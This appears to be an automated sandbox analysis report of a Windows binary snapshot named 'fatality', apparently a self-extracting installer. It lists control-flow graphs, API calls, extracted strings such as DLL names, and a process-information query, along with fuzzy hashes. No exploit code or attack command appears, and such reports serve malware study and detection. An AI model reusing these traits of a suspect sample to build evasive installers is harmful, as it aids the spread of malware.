                                                                                                                                                            • Instruction ID: fb4745c4bb3b7353abd2ddc5f3b76ba02910ede6db34112d4b504d656c6f55d4
                                                                                                                                                            • Opcode Fuzzy Hash: 7f7461bd5a9832fb55ec8957bf65d181706d38fbd16d4a07e1e3e65733c1b6c3
                                                                                                                                                            • Instruction Fuzzy Hash: D442D37195828CBAEB21ABB4DD4AFBE7B6CFB12700F004155F744E60E2CB745A45DB22

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 526 8fdf1e-8fdf66 call 8f0863 call 8fa64d call 8fac16 call 8ffff0 536 8fdf68-8fdf74 call 8fc5c4 526->536 537 8fdfe6-8fe0f4 call 8e4092 LoadIconW call 8fb6dd call 8eda42 call 8f90b7 * 2 DialogBoxParamW call 8f9178 * 2 526->537 541 8fdf76-8fdf8d 536->541 542 8fdfe0-8fdfe1 call 8fdbde 536->542 574 8fe0fd-8fe104 537->574 575 8fe0f6 537->575 547 8fdf8f-8fdf9e 541->547 548 8fdfd6-8fdfde 541->548 542->537 553 8fdfcd-8fdfd4 547->553 554 8fdfa0-8fdfcb call 900320 call 8fdbde 547->554 548->537 553->548 554->553 576 8fe10b-8fe11c call 8ef279 574->576 577 8fe106 call 8fae2f 574->577 575->574 581 8fe11e-8fe129 call 8fee5c 576->581 582 8fe12a-8fe13d DeleteObject 576->582 577->576 581->582 583 8fe13f-8fe140 DeleteObject 582->583 584 8fe146-8fe14d 582->584 583->584 586 8fe14f-8fe156 584->586 587 8fe167-8fe175 584->587 586->587 589 8fe158-8fe162 call 8e6d83 586->589 590 8fe189-8fe196 587->590 591 8fe177-8fe17d call 8fdc3b 587->591 589->587 594 8fe1ba-8fe1be call 8fac7c 590->594 595 8fe198-8fe1a4 590->595 591->590 600 8fe1c3-8fe1ce 594->600 598 8fe1a6-8fe1ae 595->598 599 8fe1b4-8fe1b6 595->599 598->594 601 8fe1b0-8fe1b2 598->601 599->594 602 8fe1b8 599->602 601->594 602->594
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FAC16: OleInitialize.OLE32(00000000), ref: 008FAC2F
                                                                                                                                                              • Part of subcall function 008FAC16: SHGetMalloc.SHELL32(00928438), ref: 008FAC70
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FE048
                                                                                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 008FE078
                                                                                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 008FE0C9
                                                                                                                                                            • DeleteObject.GDI32 ref: 008FE130
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 008FE140
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteObject$DialogIconInitializeLoadMallocParam_swprintf
                                                                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                            • API String ID: 203082903-3743209390
                                                                                                                                                            • Opcode ID: 6fd80b82da2f73e0b3eebd8b5297d9a2235c60d2cc71d1fce2bbbc56bb22670a
                                                                                                                                                            • Instruction ID: 5bc93f0176ace461a3ef5c87cf661a4ec915d8973ccdc3fbda7e345ea9b52f9d
                                                                                                                                                            • Opcode Fuzzy Hash: 6fd80b82da2f73e0b3eebd8b5297d9a2235c60d2cc71d1fce2bbbc56bb22670a
                                                                                                                                                            • Instruction Fuzzy Hash: C561F371A1C348ABD320ABB5EC49F7B77ECFB49704F004429FA45D21A1DA749944EB62

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 961 8ea69b-8ea6bf call 8fec50 964 8ea727-8ea730 961->964 965 8ea6c1-8ea6ce FindFirstFileW 961->965 966 8ea742-8ea7ff call 8f0602 call 8ec310 call 8f15da * 3 964->966 973 8ea732-8ea740 964->973 965->966 967 8ea6d0-8ea6e2 call 8ebb03 965->967 985 8ea804-8ea811 966->985 974 8ea6fe-8ea707 967->974 975 8ea6e4-8ea6fc FindFirstFileW 967->975 979 8ea719-8ea722 973->979 982 8ea709-8ea70c 974->982 983 8ea717 974->983 975->966 975->974 979->985 982->983 986 8ea70e-8ea711 982->986 983->979 986->983 988 8ea713-8ea715 986->988 988->979
                                                                                                                                                            APIs
                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,008EA592,000000FF,?,?), ref: 008EA6C4
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,008EA592,000000FF,?,?), ref: 008EA6F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • API ID: FileFindFirst$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1818217402-0
                                                                                                                                                            • Opcode ID: 6d90e126c8f619d68e4c504aa9552376fae4d8c2a42ef412f3b71da7051442c1
                                                                                                                                                            • Instruction ID: ca34c9077a1a2973946676fd1c367082df52b8105c4029ce7ecd905de5ffcb7f
                                                                                                                                                            • Opcode Fuzzy Hash: 6d90e126c8f619d68e4c504aa9552376fae4d8c2a42ef412f3b71da7051442c1
                                                                                                                                                            • Instruction Fuzzy Hash: 16418172900559ABCB29DF68CC88AEAB7B8FB49350F104196F55DE3200D7346E90CF91

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 1046 4936863-49368a8 NtQueryInformationProcess GetSystemInfo
                                                                                                                                                            APIs
                                                                                                                                                            • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04936877
                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 04936889
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoInformationProcessQuerySystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1993426926-0
                                                                                                                                                            • Opcode ID: 9fea17c230bf55bcc7ca84f4dbe3c15a18c9ad293066e79e4aaa6b2692e3f0e5
                                                                                                                                                            • Instruction ID: 79e660d132cfa06cd456eda2f8209f43fc28c4d3a190272a0ef8a1ae981022c5
                                                                                                                                                            • Opcode Fuzzy Hash: 9fea17c230bf55bcc7ca84f4dbe3c15a18c9ad293066e79e4aaa6b2692e3f0e5
                                                                                                                                                            • Instruction Fuzzy Hash: 20F0F876A00119ABCB199F99DC45EDEBBBCEB09395B018019F916D7250CA309900CBA0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 0ca9d6f81266d1b46eb5a50474e4d2e7b9651acf18ca5da6661cb743c491ef7c
                                                                                                                                                            • Instruction ID: 69ecce70a304d1f091df4abd614b8dbf16e31526ba325a78efdbc69db2ef18e9
                                                                                                                                                            • Opcode Fuzzy Hash: 0ca9d6f81266d1b46eb5a50474e4d2e7b9651acf18ca5da6661cb743c491ef7c
                                                                                                                                                            • Instruction Fuzzy Hash: 6B82D5709042C5EEDF25DB65C881AFEBBA9FF17300F0841B9E84DDB192DB615A84CB61
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4fbccffdc4b6a56424f7fda26f83b9e93bfd8758904a550f49c9c2339e19b5ed
                                                                                                                                                            • Instruction ID: ff44cb8101fc3cff7b5b2a8b251bc530f8e8d0faa85804c7d7bfcc097832aa83
                                                                                                                                                            • Opcode Fuzzy Hash: 4fbccffdc4b6a56424f7fda26f83b9e93bfd8758904a550f49c9c2339e19b5ed
                                                                                                                                                            • Instruction Fuzzy Hash: 79E04F31559148FFCF01AF50DD09A897F7DEB44351F008454F8098A172CB36EE91DB90

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00913C7C,00000800,?,00000000,?,00000800), ref: 008F0C9C
                                                                                                                                                            • _swprintf.LIBCMT ref: 008F0D4A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile_swprintf
                                                                                                                                                            • String ID: DXGIDebug.dll$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                            • API String ID: 1328629133-4162182044
                                                                                                                                                            • Opcode ID: 2d86153950e14b889f1a57941e9d7c5b63cbda59e3e5c7c4902729c0bf7e4578
                                                                                                                                                            • Instruction ID: cebc8a86f089ffd877707653807893072f4395e30af1076cc3affba54f0b2339
                                                                                                                                                            • Opcode Fuzzy Hash: 2d86153950e14b889f1a57941e9d7c5b63cbda59e3e5c7c4902729c0bf7e4578
                                                                                                                                                            • Instruction Fuzzy Hash: 6AB156B160838C9FD7319F649849BDFBAF8FB89704F50891DF68996241C7B08689CF52

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FC744
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCA0A
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCA13
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008FCA71
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCAB3
                                                                                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 008FCBFB
                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 008FCC36
                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008FCC46
                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,0092A472), ref: 008FCC54
                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008FCC7F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcsrchr
                                                                                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                            • API String ID: 1477227525-312220925
                                                                                                                                                            • Opcode ID: 328b98edbdefdbcc1ccc6f69209c0dc6c7745bc405348a99f0279644ee3af712
                                                                                                                                                            • Instruction ID: 9066edf902a9af3bb150b64620991badc7ab42e5c8213933936c5bc2ad617177
                                                                                                                                                            • Opcode Fuzzy Hash: 328b98edbdefdbcc1ccc6f69209c0dc6c7745bc405348a99f0279644ee3af712
                                                                                                                                                            • Instruction Fuzzy Hash: 6FE15EB290421CAADB249BB4DD85EFE77BCEB05350F5081A6F709E3050EB749B848B61

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            • GetDlgItem.USER32(00000068,?), ref: 008FD4E8
                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?), ref: 008FD510
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FD51B
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FD529
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD53F
                                                                                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008FD559
                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD59D
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008FD5AB
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD5BA
                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD5E1
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009143F4), ref: 008FD5F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                            • String ID: \
                                                                                                                                                            • API String ID: 3569833718-2967466578
                                                                                                                                                            • Opcode ID: e041fee2676524d276ae908a7b2d557eaafcb136d55459cd798ed423d1f689b8
                                                                                                                                                            • Instruction ID: e92a35ee20c58d213957050f13599319b14c49e5f479004f876750324d990373
                                                                                                                                                            • Opcode Fuzzy Hash: e041fee2676524d276ae908a7b2d557eaafcb136d55459cd798ed423d1f689b8
                                                                                                                                                            • Instruction Fuzzy Hash: F031F171149346AFE311DF30DC0AFAB7FACEB86708F004608F651D61A0DBA48A059776

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fprintf_l_wcslen
                                                                                                                                                            • String ID: ,$$%s:$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                            • API String ID: 2299889570-2003356997
                                                                                                                                                            • Opcode ID: a093a6b8739172a20d703462364338fa0af2d86b5c712c12fa83747bb72ff5ba
                                                                                                                                                            • Instruction ID: 3d91932e0284996a9f9320921729fe788b3f57c339b7f5c597b33d3b900538d9
                                                                                                                                                            • Opcode Fuzzy Hash: a093a6b8739172a20d703462364338fa0af2d86b5c712c12fa83747bb72ff5ba
                                                                                                                                                            • Instruction Fuzzy Hash: E1E1EF31900299EFCF24EF69C841AE977B5FF5A304F40451AF946DB281EBB1E985CB50

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ShowWindow$ExecuteShell_wcslen
                                                                                                                                                            • String ID: .exe$.inf$Install
                                                                                                                                                            • API String ID: 855908426-1844831949
                                                                                                                                                            • Opcode ID: eff4b0ea3d1d7ec5f77c128baa44d050b1f255bce4e503b3d3c0fac9e1cd239e
                                                                                                                                                            • Instruction ID: a4781505260628bdcec1514becbc090176cfeb2d6228c24f5c051fcaa120cccf
                                                                                                                                                            • Opcode Fuzzy Hash: eff4b0ea3d1d7ec5f77c128baa44d050b1f255bce4e503b3d3c0fac9e1cd239e
                                                                                                                                                            • Instruction Fuzzy Hash: A551F471618388AADB309B749844BBBBBE6FF86744F04482DF7C0D71A1D7B08985DB12

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 008FABC2
                                                                                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008FABE9
                                                                                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 008FABF9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AutoClassCompleteFindNameWindow
                                                                                                                                                            • String ID: EDIT
                                                                                                                                                            • API String ID: 1162832696-3080729518
                                                                                                                                                            • Opcode ID: 96c293bb41a3e1620097dba3fd63a5d8fdfb0849de3481c8ef0b652e8e9722df
                                                                                                                                                            • Instruction ID: 22ec51ae9f5fb87263c8a0146127c8295e65ccf9b9878007f980726c884d2dac
                                                                                                                                                            • Opcode Fuzzy Hash: 96c293bb41a3e1620097dba3fd63a5d8fdfb0849de3481c8ef0b652e8e9722df
                                                                                                                                                            • Instruction Fuzzy Hash: FAF0827670022D76DB3096749C0AFEB77ACEF46B61F484111BA45E21C0DB60DA41C5B6

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 008FAC2F
                                                                                                                                                            • SHGetMalloc.SHELL32(00928438), ref: 008FAC70
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeMalloc
                                                                                                                                                            • String ID: riched20.dll$3Ro
                                                                                                                                                            • API String ID: 48681180-3613677438
                                                                                                                                                            • Opcode ID: 410036a871970825be85d6207bfd82d4809a76d0efee5c02fc5306cc07922fc6
                                                                                                                                                            • Instruction ID: f213e4e046910c940b230d76eed899e3323b92aa6ea12c5a0e4ff4e8badbfcce
                                                                                                                                                            • Opcode Fuzzy Hash: 410036a871970825be85d6207bfd82d4809a76d0efee5c02fc5306cc07922fc6
                                                                                                                                                            • Instruction Fuzzy Hash: 01F044B5D00209ABCB10AFA9D8499EFFBFCEF85704F10812AA801E2251DBB456058FA1

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090981C
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 009098A3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID: 4
                                                                                                                                                            • API String ID: 2929853658-1536075910
                                                                                                                                                            • Opcode ID: 6100d8aedebe9392aa26f2568426f95284433358b27dfba387effe0837aef50d
                                                                                                                                                            • Instruction ID: fc56b4ab724088df6bbfe8853f506854fde2718865ef7405385bc81d6c8bd5f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6100d8aedebe9392aa26f2568426f95284433358b27dfba387effe0837aef50d
                                                                                                                                                            • Instruction Fuzzy Hash: D401D437318A016FD3166678AC49A9B16ADDBC27B1B328135FA15D73D3FE248C029164

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 240046367-0
                                                                                                                                                            • Opcode ID: a32618ac9ab1fe5113cb8c539200f6bb32bfa6cf45ecf643f90ac7981fdbe9de
                                                                                                                                                            • Instruction ID: 420b39637fdc82458f539e16b4037f8128813f584bcf85f14e839b17251e29e0
                                                                                                                                                            • Opcode Fuzzy Hash: a32618ac9ab1fe5113cb8c539200f6bb32bfa6cf45ecf643f90ac7981fdbe9de
                                                                                                                                                            • Instruction Fuzzy Hash: 1D51BD72A10316AFDB258E64CC41FBBB7AAEF84750B158629FD05D61D0EB34DC90C6E2

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008FA762
                                                                                                                                                              • Part of subcall function 008FA626: 735A6BB0.GDIPLUS(00000010), ref: 008FA62C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                                                            • String ID: PNG
                                                                                                                                                            • API String ID: 2244384528-364855578
                                                                                                                                                            • Opcode ID: 7d478d1211d19afdf954d9a6c00c7c52a8dae62ff1ec4b79ae744dd1e68b4191
                                                                                                                                                            • Instruction ID: 6001558a26f1fd378612e95ac92f6a9bd1a923c167e6074a4cb823c2b7887351
                                                                                                                                                            • Opcode Fuzzy Hash: 7d478d1211d19afdf954d9a6c00c7c52a8dae62ff1ec4b79ae744dd1e68b4191
                                                                                                                                                            • Instruction Fuzzy Hash: F631A1B560830ABFD714AF31EC48D6B7FB9FF84760B108528F949D2260EB31D940EA61

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 991 8e1e50-8e1e7f call 8feb78 call 8e3bba 995 8e1e84-8e1e86 991->995 996 8e1f0f-8e1f1b 995->996 997 8e1e8c-8e1ebd call 8e1732 call 8e18a9 995->997 998 8e1f1d-8e1f21 996->998 999 8e1f36-8e1f44 996->999 1010 8e1ece-8e1ed5 997->1010 1011 8e1ebf-8e1ecc call 8f1c3b 997->1011 1002 8e1f2f-8e1f35 call 903e2e 998->1002 1003 8e1f23-8e1f2c call 8ef445 998->1003 1002->999 1003->1002 1013 8e1eee-8e1ef6 call 8f1b84 1010->1013 1014 8e1ed7-8e1eec call 8f1bfd 1010->1014 1018 8e1efb-8e1f0e call 903e13 call 8e18a9 1011->1018 1013->1018 1014->1018 1018->996
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E1E55
                                                                                                                                                              • Part of subcall function 008E3BBA: __EH_prolog.LIBCMT ref: 008E3BBF
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E1EFD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2838827086-0
                                                                                                                                                            • Opcode ID: 652a81a0ebdd35b57d95f15aacec798d766bc3d70b6c1ddf47b8e45b5a47054a
                                                                                                                                                            • Instruction ID: bf8557a0c7f4d41a90428526f38c0138821d812c08c0fa30a0c9db363f3f7b6f
                                                                                                                                                            • Opcode Fuzzy Hash: 652a81a0ebdd35b57d95f15aacec798d766bc3d70b6c1ddf47b8e45b5a47054a
                                                                                                                                                            • Instruction Fuzzy Hash: 18311671904249AACF11DFA9C949AEEBBF5FF49310F104069E845A7251CB325E10CB61

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1024 90ba89-90ba8f 1025 90ba91-90ba9c call 9091a8 1024->1025 1026 90baae-90bab2 1024->1026 1036 90ba9e-90baad call 908dcc 1025->1036 1027 90bab4 call 908b6f 1026->1027 1028 90bab9-90bac4 1026->1028 1027->1028 1031 90bac6-90bad0 1028->1031 1032 90badb-90baf5 1028->1032 1031->1032 1034 90bad2-90bada call 908dcc 1031->1034 1035 90baf7-90bafe 1032->1035 1032->1036 1034->1032 1035->1036 1038 90bb00-90bb17 call 90b691 1035->1038 1038->1036 1045 90bb19-90bb23 1038->1045 1045->1036
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                            • Opcode ID: b5617b791fe7c0fad0594e10101c1b5bacfea90203e32830b91812e5093e5a45
